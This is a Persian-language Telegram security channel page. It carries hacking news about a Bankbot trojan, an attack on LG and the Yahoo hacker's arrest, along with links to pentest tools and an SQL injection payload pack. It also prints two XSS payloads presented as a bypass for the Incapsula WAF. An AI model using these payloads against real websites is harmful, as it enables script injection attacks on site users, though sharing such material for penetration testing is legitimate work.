امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
پست رییس سابق CIA و NSA در توییتر!
گویا پسوردی رو اشتباها توییت کرده!

#fun
دراپر تروجان بانکی با نام Bankbot توسط بعضی برنامه های موجود در گوگل پلی در گوشی کاربران نصب شده!

https://tinyurl.com/yaklfxdw

#android
#trojan
#google
ال جی کره مجددا مورد حمله سایبری قرار گرفت.
سرویس اینترنت و امنیت کره جنوبی گزارشی از شرکت ال جی مبنی بر حمله بدافزاری که شبیه به WannaCry بوده دریافت کرده.اما این موضوع کاملا تایید نشده است.
بعد از ایجاد تاخیر در برخی از سرویس های آنلاین این شرکت، کارشناسان این شرکت با کشف کدهای مخرب اقدام به خاموش کردن تعدادی از دستگاه های آلوده کردند.
هوشیاری کارشناسان باعث شده باج افزار موفق یه رمزنگاری داده ها نشه و جلوی حمله و ضرر رو به سرعت گرفتن.

#news
#lg
#wannacry
#ransomware
ابزار portia برای تست نفوذ شبکه های داخلی و بالا بردن سطح دسترسی بعد از تسخیر کاربری با سطح دسترسی پایین

https://github.com/SpiderLabs/portia

#pentest
#network
#privilege_escalate
کریم باراتف هکر روس که متهم شده به هک کردن سیستم های یاهو و سرقت اطلاعات ۵۰۰ میلیون کاربر ، در کانادا دستگیر و به امریکا تحویل داده شد.
در اولین اخبار منتشر شده کریم این هک رو تکذیب کرده.
SQL-Injection-Payloads-master.zip
8.2 KB
پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.

https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator

#windows
#malware